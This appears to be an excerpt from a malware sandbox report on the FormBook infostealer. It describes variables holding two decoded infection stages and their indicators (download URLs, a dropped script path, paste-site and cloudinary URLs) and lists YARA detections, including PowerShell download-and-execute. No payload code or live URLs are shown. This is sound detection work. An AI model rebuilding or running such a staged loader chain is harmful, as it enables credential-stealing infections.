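`STAGE1_SCRIPT` and `STAGE2_SCRIPT` hold the two decoded stages; `STAGE1_IOCS["urls"]` and `STAGE1_IOCS["paths"]` give the download URL and the dropped .vbS path, `STAGE2_IOCS["urls"]` and `STAGE2_IOCS["reversed_urls"]` the cloudinary and paste.ee URLs, and `STAGE2_IOCS["reflection"]` the `dnlib.IO.Home.VAI` entry point. Because the whole chain is in the command lines, every indicator here comes out of a process-creation log alone, before any network capture.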
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Formbook, Formbo | FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware. | | | |
No configs have been found.
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security | |

Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
 | Windows_Trojan_Formbook_1112e116 | unknown | unknown | |
 | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
 | Windows_Trojan_Formbook_1112e116 | unknown | unknown | |
 | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |

Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
 | Windows_Trojan_Formbook_1112e116 | unknown | unknown | |
 | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
 | Windows_Trojan_Formbook_1112e116 | unknown | unknown | |

Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
 | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |